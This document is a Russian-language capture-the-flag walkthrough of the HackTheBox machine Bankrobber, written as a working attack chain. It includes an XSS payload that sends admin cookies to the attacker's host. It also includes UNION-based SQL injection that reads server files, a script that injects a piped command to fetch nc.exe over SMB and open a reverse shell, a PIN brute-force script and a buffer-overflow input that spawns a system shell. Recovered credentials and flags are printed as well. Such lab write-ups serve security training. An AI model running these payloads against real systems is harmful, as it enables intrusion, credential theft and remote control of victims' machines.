HackTheBox Bankrobber

Обзор сервисов

$ nmapAutomator.sh -H 10.10.10.154 -t Full

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
443/tcp  open  ssl/http     Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql        MariaDB (unauthorized)
Service Info: Host: BANKROBBER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4m06s, deviation: 0s, median: 4m06s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-06-04T11:00:22
|_  start_date: 2021-06-04T10:55:07

Веб

http://10.10.10.154

создадим пользователя 123user:123user123
id, username и password сохраняются как cookie

Отправляем монеты кому-нибудь => admin проверяет транзакцию.

В комментарий пробросим XSS:

javascript:document.write('<script>img = new Image(); img.src = "http://10.10.14.6/img.gif?"+document.cookie;</script>')

Стартуем сервер python3 -m http.server 80 =>

"GET /img.gif?username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP/1.1" 404 -

=> admin:Hopelessromantic => логинимся как admin.

Xampp

https://10.10.10.154/notes.txt => default xampp folder (C:\xampp)

SQL Injection

Пробуем в поиске пользователя:

1 and 1=1

Используем Burp Repeater, чтобы найти идентификатор количества колонок:

term=1'+order+by+3--+- - ok
term=1'+order+by+4--+- - not ok

=> 3 колонки

term=1'+union+select+user(),2,3--+-

root@localhost

term=1'+union+select+database(),2,3--+-

bankrobber

term=1'+union+select+load_file("C:/xampp/htdocs/admin/backdoorchecker.php"),2,3--+-

<?php
include('../link.php');
include('auth.php');

$username = base64_decode(urldecode($_COOKIE['username']));
$password = base64_decode(urldecode($_COOKIE['password']));
$bad    = array('$(','&');
$good    = "ls";

if(strtolower(substr(PHP_OS,0,3)) == "win"){
 $good = "dir";
}

if($username == "admin" && $password == "Hopelessromantic"){
 if(isset($_POST['cmd'])){
   // FILTER ESCAPE CHARS
   foreach($bad as $char){
    if(strpos($_POST['cmd'],$char) !== false){
     die("You're not allowed to do that.");
    }
   }
   // CHECK IF THE FIRST 2 CHARS ARE LS
   if(substr($_POST['cmd'], 0,strlen($good)) != $good){
    die("It's only allowed to use the $good command");
   }

   if($_SERVER['REMOTE_ADDR'] == "::1"){
    system($_POST['cmd']);
   } else{
    echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
   }
 }
} else{
 echo "You are not allowed to use this function!";
}
?>

=> pipe | символ не проверяется.

$ nano script.js:

var xhr = new XMLHttpRequest();
var url = "http://localhost/admin/backdoorchecker.php";
var params = "cmd=dir | \\\\10.10.14.6\\share\\nc.exe 10.10.14.6 1234 -e cmd.exe";
xhr.open("POST", url);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.withCredentials = true;
xhr.send(params);

Стартуем сервер самбы:

smbserver.py -smb2support share $(pwd)
nc -lnvp 1234

Отправляем транзакцию с помощью Burp:

POST /user/transfer.php HTTP/1.1
Host: 10.10.10.154
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 84
Origin: http://10.10.10.154
Connection: close
Referer: http://10.10.10.154/user/
Cookie: id=3; username=MTIzdXNlcg%3D%3D; password=MTIzdXNlcjEyMw%3D%3D

fromId=3&toId=1&amount=1&comment=<script+src="http://10.10.14.6/script.js"></script>

Запускаем сервер python3 -m http.server 80.

Флаг пользователя

C:\Users\Cortin\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::558a:2e46:9d1f:9962
   Temporary IPv6 Address. . . . . . : dead:beef::423:ec2c:39c7:2b02
   Link-local IPv6 Address . . . . . : fe80::558a:2e46:9d1f:9962%2
   IPv4 Address. . . . . . . . . . . : 10.10.10.154
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%2
                                       10.10.10.2
Tunnel adapter isatap.{0637FAE2-5EF8-43F7-ADAC-E58020091A92}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
C:\Users\Cortin\Desktop>type user.txt
f635346600876a43441cf1c6e94769ac

Повышение привилегий

$ netstat -anop TCP
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       2904
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       748
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       2904
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:910            0.0.0.0:0              LISTENING       1620
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       1828
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       464
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       920
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       892
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1416
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       592
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       600
  TCP    10.10.10.154:139       0.0.0.0:0              LISTENING       4
  TCP    10.10.10.154:49848     10.10.14.6:445         ESTABLISHED     4
  TCP    10.10.10.154:49850     10.10.14.6:1234        ESTABLISHED     4160
  TCP    127.0.0.1:3306         127.0.0.1:49846        ESTABLISHED     1828
  TCP    127.0.0.1:3306         127.0.0.1:49847        ESTABLISHED     1828
  TCP    127.0.0.1:49846        127.0.0.1:3306         ESTABLISHED     3156
  TCP    127.0.0.1:49847        127.0.0.1:3306         ESTABLISHED     3156
  TCP    127.0.0.1:49854        127.0.0.1:3306         TIME_WAIT       0

=> 910 порт странный.

Port Forwarding

Используем Chisel:

$ wget https://github.com/jpillora/chisel/releases/download/v1.7.6/chisel_1.7.6_windows_amd64.gz
$ gunzip chisel..
for windows and for linux
https://github.com/jpillora/chisel/releases/download/v1.7.6/chisel_1.7.6_linux_amd64.gz
$ ./chisel server --port 5555 -reverse

И на машине:

certutil -urlcache -f "http://10.10.14.6/chisel_1.7.6_windows_amd64" chisel.exe
chisel client 10.10.14.6:5555 R:910:127.0.0.1:910

На локальной машине:

$ nc 127.0.0.1 910
--------------------------------------------------------------
 Internet E-Coin Transfer System
 International Bank of Sun church
                                        v0.1 by Gio & Cneeliz
 --------------------------------------------------------------
 Please enter your super secret 4 digit PIN code to login:
 [$] 1234
 [!] Access denied, disconnecting client....

Пишем скрипт для брута code.py:

import socket

for i in range(0, 10000):
 code = "0" * (4 - len(str(i))) + str(i)
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect(("localhost", 910))
 data = s.recv(8192)
 s.send(code.encode() + b"\n")
 data = s.recv(8192).decode("utf-8")
 s.close()
 if "Access denied" not in data:
  print(f"valid code: {code}")
  break

$ python code.py
0021

--------------------------------------------------------------  

 Internet E-Coin Transfer System  
 International Bank of Sun church  
                                        v0.1 by Gio & Cneeliz
 --------------------------------------------------------------  

 Please enter your super secret 4 digit PIN code to login:  
 [$] 0021  
 [$] PIN is correct, access granted!
 --------------------------------------------------------------  

 Please enter the amount of e-coins you would like to transfer:  
 [$] 100  
 [$] Transfering $100 using our e-coin transfer application.  
 [$] Executing e-coin transfer tool: C:\Users\admin\Documents\transfer.exe

 [$] Transaction in progress, you can safely disconnect...

=> пробуем buffer overflow => копируем nc.exe в C:\users\public\nc.exe

После этого:

$ nc -lnvp 1235
$ nc localhost 910
0021
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC:\Users\Public\nc.exe 10.10.14.6 1235 -e cmd.exe

Флаг суперпользователя

C:\Users\admin\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::558a:2e46:9d1f:9962
   Temporary IPv6 Address. . . . . . : dead:beef::423:ec2c:39c7:2b02
   Link-local IPv6 Address . . . . . : fe80::558a:2e46:9d1f:9962%2
   IPv4 Address. . . . . . . . . . . : 10.10.10.154
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%2
                                       10.10.10.2
Tunnel adapter isatap.{0637FAE2-5EF8-43F7-ADAC-E58020091A92}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
C:\Users\admin\Desktop>type root.txt
aa65d8e6216585ea636eb07d4a59b197

Обзор сервисов #

Веб #

Xampp #

SQL Injection #

Флаг пользователя #

Повышение привилегий #

Port Forwarding #

Флаг суперпользователя #